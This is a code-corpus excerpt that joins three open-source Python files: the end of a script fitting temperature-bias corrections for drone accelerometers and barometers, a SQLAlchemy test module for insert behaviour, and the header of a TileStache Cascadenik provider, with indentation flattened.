plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['z'],'b')
plt.plot(temp_resample,gyro_2_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 0 thermal correction parameters
accel_0_params = {
'TC_A0_ID':0,
'TC_A0_TMIN':0.0,
'TC_A0_TMAX':0.0,
'TC_A0_TREF':0.0,
'TC_A0_X0_0':0.0,
'TC_A0_X1_0':0.0,
'TC_A0_X2_0':0.0,
'TC_A0_X3_0':0.0,
'TC_A0_X0_1':0.0,
'TC_A0_X1_1':0.0,
'TC_A0_X2_1':0.0,
'TC_A0_X3_1':0.0,
'TC_A0_X0_2':0.0,
'TC_A0_X1_2':0.0,
'TC_A0_X2_2':0.0,
'TC_A0_X3_2':0.0,
'TC_A0_SCL_0':1.0,
'TC_A0_SCL_1':1.0,
'TC_A0_SCL_2':1.0
}
# curve fit the data for accel 0 corrections
if num_accels >= 1:
accel_0_params['TC_A0_ID'] = int(np.median(sensor_accel_0['device_id']))
# find the min, max and reference temperature
accel_0_params['TC_A0_TMIN'] = np.amin(sensor_accel_0['temperature'])
accel_0_params['TC_A0_TMAX'] = np.amax(sensor_accel_0['temperature'])
accel_0_params['TC_A0_TREF'] = 0.5 * (accel_0_params['TC_A0_TMIN'] + accel_0_params['TC_A0_TMAX'])
temp_rel = sensor_accel_0['temperature'] - accel_0_params['TC_A0_TREF']
temp_rel_resample = np.linspace(accel_0_params['TC_A0_TMIN']-accel_0_params['TC_A0_TREF'], accel_0_params['TC_A0_TMAX']-accel_0_params['TC_A0_TREF'], 100)
temp_resample = temp_rel_resample + accel_0_params['TC_A0_TREF']
# fit X axis
correction_x = sensor_accel_0['x'] - np.median(sensor_accel_0['x'])
coef_accel_0_x = np.polyfit(temp_rel,correction_x,3)
accel_0_params['TC_A0_X3_0'] = coef_accel_0_x[0]
accel_0_params['TC_A0_X2_0'] = coef_accel_0_x[1]
accel_0_params['TC_A0_X1_0'] = coef_accel_0_x[2]
accel_0_params['TC_A0_X0_0'] = coef_accel_0_x[3]
fit_coef_accel_0_x = np.poly1d(coef_accel_0_x)
correction_x_resample = fit_coef_accel_0_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_0['y']-np.median(sensor_accel_0['y'])
coef_accel_0_y = np.polyfit(temp_rel,correction_y,3)
accel_0_params['TC_A0_X3_1'] = coef_accel_0_y[0]
accel_0_params['TC_A0_X2_1'] = coef_accel_0_y[1]
accel_0_params['TC_A0_X1_1'] = coef_accel_0_y[2]
accel_0_params['TC_A0_X0_1'] = coef_accel_0_y[3]
fit_coef_accel_0_y = np.poly1d(coef_accel_0_y)
correction_y_resample = fit_coef_accel_0_y(temp_rel_resample)
# fit Z axis
correction_z = sensor_accel_0['z']-np.median(sensor_accel_0['z'])
coef_accel_0_z = np.polyfit(temp_rel,correction_z,3)
accel_0_params['TC_A0_X3_2'] = coef_accel_0_z[0]
accel_0_params['TC_A0_X2_2'] = coef_accel_0_z[1]
accel_0_params['TC_A0_X1_2'] = coef_accel_0_z[2]
accel_0_params['TC_A0_X0_2'] = coef_accel_0_z[3]
fit_coef_accel_0_z = np.poly1d(coef_accel_0_z)
correction_z_resample = fit_coef_accel_0_z(temp_rel_resample)
# accel 0 vs temperature
plt.figure(4,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_0['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 0 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_0['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_0['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 1 thermal correction parameters
accel_1_params = {
'TC_A1_ID':0,
'TC_A1_TMIN':0.0,
'TC_A1_TMAX':0.0,
'TC_A1_TREF':0.0,
'TC_A1_X0_0':0.0,
'TC_A1_X1_0':0.0,
'TC_A1_X2_0':0.0,
'TC_A1_X3_0':0.0,
'TC_A1_X0_1':0.0,
'TC_A1_X1_1':0.0,
'TC_A1_X2_1':0.0,
'TC_A1_X3_1':0.0,
'TC_A1_X0_2':0.0,
'TC_A1_X1_2':0.0,
'TC_A1_X2_2':0.0,
'TC_A1_X3_2':0.0,
'TC_A1_SCL_0':1.0,
'TC_A1_SCL_1':1.0,
'TC_A1_SCL_2':1.0
}
# curve fit the data for accel 1 corrections
if num_accels >= 2:
accel_1_params['TC_A1_ID'] = int(np.median(sensor_accel_1['device_id']))
# find the min, max and reference temperature
accel_1_params['TC_A1_TMIN'] = np.amin(sensor_accel_1['temperature'])
accel_1_params['TC_A1_TMAX'] = np.amax(sensor_accel_1['temperature'])
accel_1_params['TC_A1_TREF'] = 0.5 * (accel_1_params['TC_A1_TMIN'] + accel_1_params['TC_A1_TMAX'])
temp_rel = sensor_accel_1['temperature'] - accel_1_params['TC_A1_TREF']
temp_rel_resample = np.linspace(accel_1_params['TC_A1_TMIN']-accel_1_params['TC_A1_TREF'], accel_1_params['TC_A1_TMAX']-accel_1_params['TC_A1_TREF'], 100)
temp_resample = temp_rel_resample + accel_1_params['TC_A1_TREF']
# fit X axis
correction_x = sensor_accel_1['x']-np.median(sensor_accel_1['x'])
coef_accel_1_x = np.polyfit(temp_rel,correction_x,3)
accel_1_params['TC_A1_X3_0'] = coef_accel_1_x[0]
accel_1_params['TC_A1_X2_0'] = coef_accel_1_x[1]
accel_1_params['TC_A1_X1_0'] = coef_accel_1_x[2]
accel_1_params['TC_A1_X0_0'] = coef_accel_1_x[3]
fit_coef_accel_1_x = np.poly1d(coef_accel_1_x)
correction_x_resample = fit_coef_accel_1_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_1['y']-np.median(sensor_accel_1['y'])
coef_accel_1_y = np.polyfit(temp_rel,correction_y,3)
accel_1_params['TC_A1_X3_1'] = coef_accel_1_y[0]
accel_1_params['TC_A1_X2_1'] = coef_accel_1_y[1]
accel_1_params['TC_A1_X1_1'] = coef_accel_1_y[2]
accel_1_params['TC_A1_X0_1'] = coef_accel_1_y[3]
fit_coef_accel_1_y = np.poly1d(coef_accel_1_y)
correction_y_resample = fit_coef_accel_1_y(temp_rel_resample)
# fit Z axis
correction_z = (sensor_accel_1['z'])-np.median(sensor_accel_1['z'])
coef_accel_1_z = np.polyfit(temp_rel,correction_z,3)
accel_1_params['TC_A1_X3_2'] = coef_accel_1_z[0]
accel_1_params['TC_A1_X2_2'] = coef_accel_1_z[1]
accel_1_params['TC_A1_X1_2'] = coef_accel_1_z[2]
accel_1_params['TC_A1_X0_2'] = coef_accel_1_z[3]
fit_coef_accel_1_z = np.poly1d(coef_accel_1_z)
correction_z_resample = fit_coef_accel_1_z(temp_rel_resample)
# accel 1 vs temperature
plt.figure(5,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_1['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 1 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_1['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_1['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 2 thermal correction parameters
accel_2_params = {
'TC_A2_ID':0,
'TC_A2_TMIN':0.0,
'TC_A2_TMAX':0.0,
'TC_A2_TREF':0.0,
'TC_A2_X0_0':0.0,
'TC_A2_X1_0':0.0,
'TC_A2_X2_0':0.0,
'TC_A2_X3_0':0.0,
'TC_A2_X0_1':0.0,
'TC_A2_X1_1':0.0,
'TC_A2_X2_1':0.0,
'TC_A2_X3_1':0.0,
'TC_A2_X0_2':0.0,
'TC_A2_X1_2':0.0,
'TC_A2_X2_2':0.0,
'TC_A2_X3_2':0.0,
'TC_A2_SCL_0':1.0,
'TC_A2_SCL_1':1.0,
'TC_A2_SCL_2':1.0
}
# curve fit the data for accel 2 corrections
if num_accels >= 3:
accel_2_params['TC_A2_ID'] = int(np.median(sensor_accel_2['device_id']))
# find the min, max and reference temperature
accel_2_params['TC_A2_TMIN'] = np.amin(sensor_accel_2['temperature'])
accel_2_params['TC_A2_TMAX'] = np.amax(sensor_accel_2['temperature'])
accel_2_params['TC_A2_TREF'] = 0.5 * (accel_2_params['TC_A2_TMIN'] + accel_2_params['TC_A2_TMAX'])
temp_rel = sensor_accel_2['temperature'] - accel_2_params['TC_A2_TREF']
temp_rel_resample = np.linspace(accel_2_params['TC_A2_TMIN']-accel_2_params['TC_A2_TREF'], accel_2_params['TC_A2_TMAX']-accel_2_params['TC_A2_TREF'], 100)
temp_resample = temp_rel_resample + accel_2_params['TC_A2_TREF']
# fit X axis
correction_x = sensor_accel_2['x']-np.median(sensor_accel_2['x'])
coef_accel_2_x = np.polyfit(temp_rel,correction_x,3)
accel_2_params['TC_A2_X3_0'] = coef_accel_2_x[0]
accel_2_params['TC_A2_X2_0'] = coef_accel_2_x[1]
accel_2_params['TC_A2_X1_0'] = coef_accel_2_x[2]
accel_2_params['TC_A2_X0_0'] = coef_accel_2_x[3]
fit_coef_accel_2_x = np.poly1d(coef_accel_2_x)
correction_x_resample = fit_coef_accel_2_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_2['y']-np.median(sensor_accel_2['y'])
coef_accel_2_y = np.polyfit(temp_rel,correction_y,3)
accel_2_params['TC_A2_X3_1'] = coef_accel_2_y[0]
accel_2_params['TC_A2_X2_1'] = coef_accel_2_y[1]
accel_2_params['TC_A2_X1_1'] = coef_accel_2_y[2]
accel_2_params['TC_A2_X0_1'] = coef_accel_2_y[3]
fit_coef_accel_2_y = np.poly1d(coef_accel_2_y)
correction_y_resample = fit_coef_accel_2_y(temp_rel_resample)
# fit Z axis
correction_z = sensor_accel_2['z']-np.median(sensor_accel_2['z'])
coef_accel_2_z = np.polyfit(temp_rel,correction_z,3)
accel_2_params['TC_A2_X3_2'] = coef_accel_2_z[0]
accel_2_params['TC_A2_X2_2'] = coef_accel_2_z[1]
accel_2_params['TC_A2_X1_2'] = coef_accel_2_z[2]
accel_2_params['TC_A2_X0_2'] = coef_accel_2_z[3]
fit_coef_accel_2_z = np.poly1d(coef_accel_2_z)
correction_z_resample = fit_coef_accel_2_z(temp_rel_resample)
# accel 2 vs temperature
plt.figure(6,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_2['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 2 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_2['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_2['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of baro 0 thermal correction parameters
baro_0_params = {
'TC_B0_ID':0,
'TC_B0_TMIN':0.0,
'TC_B0_TMAX':0.0,
'TC_B0_TREF':0.0,
'TC_B0_X0':0.0,
'TC_B0_X1':0.0,
'TC_B0_X2':0.0,
'TC_B0_X3':0.0,
'TC_B0_X4':0.0,
'TC_B0_X5':0.0,
'TC_B0_SCL':1.0,
}
# curve fit the data for baro 0 corrections
baro_0_params['TC_B0_ID'] = int(np.median(sensor_baro_0['device_id']))
# find the min, max and reference temperature
baro_0_params['TC_B0_TMIN'] = np.amin(sensor_baro_0['temperature'])
baro_0_params['TC_B0_TMAX'] = np.amax(sensor_baro_0['temperature'])
baro_0_params['TC_B0_TREF'] = 0.5 * (baro_0_params['TC_B0_TMIN'] + baro_0_params['TC_B0_TMAX'])
temp_rel = sensor_baro_0['temperature'] - baro_0_params['TC_B0_TREF']
temp_rel_resample = np.linspace(baro_0_params['TC_B0_TMIN']-baro_0_params['TC_B0_TREF'], baro_0_params['TC_B0_TMAX']-baro_0_params['TC_B0_TREF'], 100)
temp_resample = temp_rel_resample + baro_0_params['TC_B0_TREF']
# fit data
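# unlike the 3rd-order per-axis fits above, baro bias is fitted with a single 5th-order polynomial in pressure offset from the median (hPa scaled to Pa)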
median_pressure = np.median(sensor_baro_0['pressure'])
coef_baro_0_x = np.polyfit(temp_rel,100*(sensor_baro_0['pressure']-median_pressure),5) # convert from hPa to Pa
baro_0_params['TC_B0_X5'] = coef_baro_0_x[0]
baro_0_params['TC_B0_X4'] = coef_baro_0_x[1]
baro_0_params['TC_B0_X3'] = coef_baro_0_x[2]
baro_0_params['TC_B0_X2'] = coef_baro_0_x[3]
baro_0_params['TC_B0_X1'] = coef_baro_0_x[4]
baro_0_params['TC_B0_X0'] = coef_baro_0_x[5]
fit_coef_baro_0_x = np.poly1d(coef_baro_0_x)
baro_0_x_resample = fit_coef_baro_0_x(temp_rel_resample)
# baro 0 vs temperature
plt.figure(7,figsize=(20,13))
# draw plots
plt.plot(sensor_baro_0['temperature'],100*sensor_baro_0['pressure']-100*median_pressure,'b')
plt.plot(temp_resample,baro_0_x_resample,'r')
plt.title('Baro 0 Bias vs Temperature')
plt.ylabel('Z bias (Pa)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
# define data dictionary of baro 1 thermal correction parameters
baro_1_params = {
'TC_B1_ID':0,
'TC_B1_TMIN':0.0,
'TC_B1_TMAX':0.0,
'TC_B1_TREF':0.0,
'TC_B1_X0':0.0,
'TC_B1_X1':0.0,
'TC_B1_X2':0.0,
'TC_B1_X3':0.0,
'TC_B1_X4':0.0,
'TC_B1_X5':0.0,
'TC_B1_SCL':1.0,
}
if num_baros >= 2:
# curve fit the data for baro 0 corrections
baro_1_params['TC_B1_ID'] = int(np.median(sensor_baro_1['device_id']))
# find the min, max and reference temperature
baro_1_params['TC_B1_TMIN'] = np.amin(sensor_baro_1['temperature'])
baro_1_params['TC_B1_TMAX'] = np.amax(sensor_baro_1['temperature'])
baro_1_params['TC_B1_TREF'] = 0.5 * (baro_1_params['TC_B1_TMIN'] + baro_1_params['TC_B1_TMAX'])
temp_rel = sensor_baro_1['temperature'] - baro_1_params['TC_B1_TREF']
temp_rel_resample = np.linspace(baro_1_params['TC_B1_TMIN']-baro_1_params['TC_B1_TREF'], baro_1_params['TC_B1_TMAX']-baro_1_params['TC_B1_TREF'], 100)
temp_resample = temp_rel_resample + baro_1_params['TC_B1_TREF']
# fit data
median_pressure = np.median(sensor_baro_1['pressure'])
coef_baro_1_x = np.polyfit(temp_rel,100*(sensor_baro_1['pressure']-median_pressure),5) # convert from hPa to Pa
baro_1_params['TC_B1_X5'] = coef_baro_1_x[0]
baro_1_params['TC_B1_X4'] = coef_baro_1_x[1]
baro_1_params['TC_B1_X3'] = coef_baro_1_x[2]
baro_1_params['TC_B1_X2'] = coef_baro_1_x[3]
baro_1_params['TC_B1_X1'] = coef_baro_1_x[4]
baro_1_params['TC_B1_X0'] = coef_baro_1_x[5]
fit_coef_baro_1_x = np.poly1d(coef_baro_1_x)
baro_1_x_resample = fit_coef_baro_1_x(temp_rel_resample)
# baro 1 vs temperature
plt.figure(8,figsize=(20,13))
# draw plots
plt.plot(sensor_baro_1['temperature'],100*sensor_baro_1['pressure']-100*median_pressure,'b')
plt.plot(temp_resample,baro_1_x_resample,'r')
plt.title('Baro 1 Bias vs Temperature')
plt.ylabel('Z bias (Pa)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
# close the pdf file
pp.close()
# close all figures
plt.close("all")
# write correction parameters to file
test_results_filename = ulog_file_name + ".params"
file = open(test_results_filename,"w")
file.write("# Sensor thermal compensation parameters\n")
file.write("#\n")
file.write("# Vehicle-Id Component-Id Name Value Type\n")
# accel 0 corrections
key_list_accel = list(accel_0_params.keys())
key_list_accel.sort()
for key in key_list_accel:
if key == 'TC_A0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_0_params[key])+"\t"+type+"\n")
# accel 1 corrections
key_list_accel = list(accel_1_params.keys())
key_list_accel.sort()
for key in key_list_accel:
if key == 'TC_A1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_1_params[key])+"\t"+type+"\n")
# accel 2 corrections
key_list_accel = list(accel_2_params.keys())
key_list_accel.sort()
for key in key_list_accel:
if key == 'TC_A2_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_2_params[key])+"\t"+type+"\n")
# baro 0 corrections
key_list_baro = list(baro_0_params.keys())
key_list_baro.sort()
for key in key_list_baro:
if key == 'TC_B0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(baro_0_params[key])+"\t"+type+"\n")
# baro 1 corrections
key_list_baro = list(baro_1_params.keys())
key_list_baro.sort()
for key in key_list_baro:
if key == 'TC_B1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(baro_1_params[key])+"\t"+type+"\n")
# gyro 0 corrections
key_list_gyro = list(gyro_0_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_0_params[key])+"\t"+type+"\n")
# gyro 1 corrections
key_list_gyro = list(gyro_1_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_1_params[key])+"\t"+type+"\n")
# gyro 2 corrections
key_list_gyro = list(gyro_2_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G2_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_2_params[key])+"\t"+type+"\n")
file.close()
print('Correction parameters written to ' + test_results_filename)
print('Plots saved to ' + output_plot_filename)
| bsd-3-clause |
hsum/sqlalchemy | test/sql/test_insert_exec.py | 9 | 14651 | from sqlalchemy.testing import eq_, assert_raises_message, is_
from sqlalchemy import testing
from sqlalchemy.testing import fixtures, engines
from sqlalchemy import (
exc, sql, String, Integer, MetaData, and_, ForeignKey,
VARCHAR, INT, Sequence, func)
from sqlalchemy.testing.schema import Table, Column
class InsertExecTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'users', metadata,
Column(
'user_id', INT, primary_key=True,
test_needs_autoincrement=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
@testing.requires.multivalues_inserts
def test_multivalues_insert(self):
users = self.tables.users
users.insert(
values=[
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'}]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
eq_(rows[0], (7, 'jack'))
eq_(rows[1], (8, 'ed'))
users.insert(values=[(9, 'jack'), (10, 'ed')]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
eq_(rows[2], (9, 'jack'))
eq_(rows[3], (10, 'ed'))
def test_insert_heterogeneous_params(self):
"""test that executemany parameters are asserted to match the
parameter set of the first."""
users = self.tables.users
assert_raises_message(
exc.StatementError,
r"\(sqlalchemy.exc.InvalidRequestError\) A value is required for "
"bind parameter 'user_name', in "
"parameter group 2 "
r"\[SQL: u?'INSERT INTO users",
users.insert().execute,
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
# this succeeds however. We aren't yet doing
# a length check on all subsequent parameters.
users.insert().execute(
{'user_id': 7},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
def _test_lastrow_accessor(self, table_, values, assertvalues):
"""Tests the inserted_primary_key and lastrow_has_id() functions."""
def insert_values(engine, table_, values):
"""
Inserts a row into a table, returns the full list of values
INSERTed including defaults that fired off on the DB side and
detects rows that had defaults and post-fetches.
"""
# verify implicit_returning is working
if engine.dialect.implicit_returning:
ins = table_.insert()
comp = ins.compile(engine, column_keys=list(values))
if not set(values).issuperset(
c.key for c in table_.primary_key):
is_(bool(comp.returning), True)
result = engine.execute(table_.insert(), **values)
ret = values.copy()
for col, id in zip(
table_.primary_key, result.inserted_primary_key):
ret[col.key] = id
if result.lastrow_has_defaults():
criterion = and_(
*[
col == id for col, id in
zip(table_.primary_key, result.inserted_primary_key)])
row = engine.execute(table_.select(criterion)).first()
for c in table_.c:
ret[c.key] = row[c]
return ret
if testing.against('firebird', 'postgresql', 'oracle', 'mssql'):
assert testing.db.dialect.implicit_returning
if testing.db.dialect.implicit_returning:
test_engines = [
engines.testing_engine(options={'implicit_returning': False}),
engines.testing_engine(options={'implicit_returning': True}),
]
else:
test_engines = [testing.db]
for engine in test_engines:
try:
table_.create(bind=engine, checkfirst=True)
i = insert_values(engine, table_, values)
eq_(i, assertvalues)
finally:
table_.drop(bind=engine)
@testing.skip_if('sqlite')
def test_lastrow_accessor_one(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t1", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True)),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi'}
)
@testing.skip_if('sqlite')
def test_lastrow_accessor_two(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t2", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
)
def test_lastrow_accessor_three(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t3", metadata,
Column("id", String(40), primary_key=True),
Column('foo', String(30), primary_key=True),
Column("bar", String(30))
),
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"},
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"}
)
def test_lastrow_accessor_four(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t4", metadata,
Column(
'id', Integer,
Sequence('t4_id_seq', optional=True),
primary_key=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi', 'id': 1},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
)
def test_lastrow_accessor_five(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t5", metadata,
Column('id', String(10), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'id': 'id1'},
{'id': 'id1', 'bar': 'hi'},
)
@testing.skip_if('sqlite')
def test_lastrow_accessor_six(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t6", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('bar', Integer, primary_key=True)
),
{'bar': 0},
{'id': 1, 'bar': 0},
)
# TODO: why not in the sqlite suite?
@testing.only_on('sqlite+pysqlite')
@testing.provide_metadata
def test_lastrowid_zero(self):
from sqlalchemy.dialects import sqlite
eng = engines.testing_engine()
class ExcCtx(sqlite.base.SQLiteExecutionContext):
def get_lastrowid(self):
return 0
eng.dialect.execution_ctx_cls = ExcCtx
t = Table(
't', self.metadata, Column('x', Integer, primary_key=True),
Column('y', Integer))
t.create(eng)
r = eng.execute(t.insert().values(y=5))
eq_(r.inserted_primary_key, [0])
@testing.fails_on(
'sqlite', "sqlite autoincremnt doesn't work with composite pks")
@testing.provide_metadata
def test_misordered_lastrow(self):
metadata = self.metadata
related = Table(
'related', metadata,
Column('id', Integer, primary_key=True),
mysql_engine='MyISAM'
)
t6 = Table(
"t6", metadata,
Column(
'manual_id', Integer, ForeignKey('related.id'),
primary_key=True),
Column(
'auto_id', Integer, primary_key=True,
test_needs_autoincrement=True),
mysql_engine='MyISAM'
)
metadata.create_all()
r = related.insert().values(id=12).execute()
id_ = r.inserted_primary_key[0]
eq_(id_, 12)
r = t6.insert().values(manual_id=id_).execute()
eq_(r.inserted_primary_key, [12, 1])
def test_implicit_id_insert_select_columns(self):
users = self.tables.users
stmt = users.insert().from_select(
(users.c.user_id, users.c.user_name),
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_implicit_id_insert_select_keys(self):
users = self.tables.users
stmt = users.insert().from_select(
["user_id", "user_name"],
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
@testing.requires.empty_inserts
@testing.requires.returning
def test_no_inserted_pk_on_returning(self):
users = self.tables.users
result = testing.db.execute(users.insert().returning(
users.c.user_id, users.c.user_name))
assert_raises_message(
exc.InvalidRequestError,
r"Can't call inserted_primary_key when returning\(\) is used.",
getattr, result, 'inserted_primary_key'
)
class TableInsertTest(fixtures.TablesTest):
"""test for consistent insert behavior across dialects
regarding the inline=True flag, lower-case 't' tables.
"""
run_create_tables = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, Sequence('t_id_seq'), primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _fixture(self, types=True):
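# build a lightweight sql.table() construct (the "lower-case 't' table" from the class docstring), optionally without column types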
if types:
t = sql.table(
'foo', sql.column('id', Integer),
sql.column('data', String),
sql.column('x', Integer))
else:
t = sql.table(
'foo', sql.column('id'), sql.column('data'), sql.column('x'))
return t
def _test(self, stmt, row, returning=None, inserted_primary_key=False):
r = testing.db.execute(stmt)
if returning:
returned = r.first()
eq_(returned, returning)
elif inserted_primary_key is not False:
eq_(r.inserted_primary_key, inserted_primary_key)
eq_(testing.db.execute(self.tables.foo.select()).first(), row)
def _test_multi(self, stmt, rows, data):
testing.db.execute(stmt, rows)
eq_(
testing.db.execute(
self.tables.foo.select().
order_by(self.tables.foo.c.id)).fetchall(),
data)
@testing.requires.sequences
def test_explicit_sequence(self):
t = self._fixture()
self._test(
t.insert().values(
id=func.next_value(Sequence('t_id_seq')), data='data', x=5),
(1, 'data', 5)
)
def test_uppercase(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_inline(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.crashes(
"mssql+pyodbc",
"Pyodbc + SQL Server + Py3K, some decimal handling issue")
def test_uppercase_inline_implicit(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[None]
)
def test_uppercase_implicit(self):
t = self.tables.foo
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_direct_params(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.requires.returning
def test_uppercase_direct_params_returning(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
def test_direct_params(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
@testing.requires.returning
def test_direct_params_returning(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.requires.emulated_lastrowid
def test_implicit_pk(self):
t = self._fixture()
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_multi_rows(self):
t = self._fixture()
self._test_multi(
t.insert(),
[
{'data': 'd1', 'x': 5},
{'data': 'd2', 'x': 6},
{'data': 'd3', 'x': 7},
],
[
(1, 'd1', 5),
(2, 'd2', 6),
(3, 'd3', 7)
],
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_inline(self):
t = self._fixture()
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
| mit |
SEL-Columbia/TileStache | TileStache/Goodies/Providers/Cascadenik.py | 13 | 1591 | ''' Cascadenik Provider.
Simple wrapper for TileStache Mapnik provider that parses Cascadenik MML files
directly, skipping the typical compilation to XML step.
More information on Cascadenik:
- https://github.com/mapnik/Cascadenik/wiki/Cascadenik
Requires Cascadenik 2.x+.
'''
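# A hedged usage sketch (not part of the original module): in a TileStache configuration this
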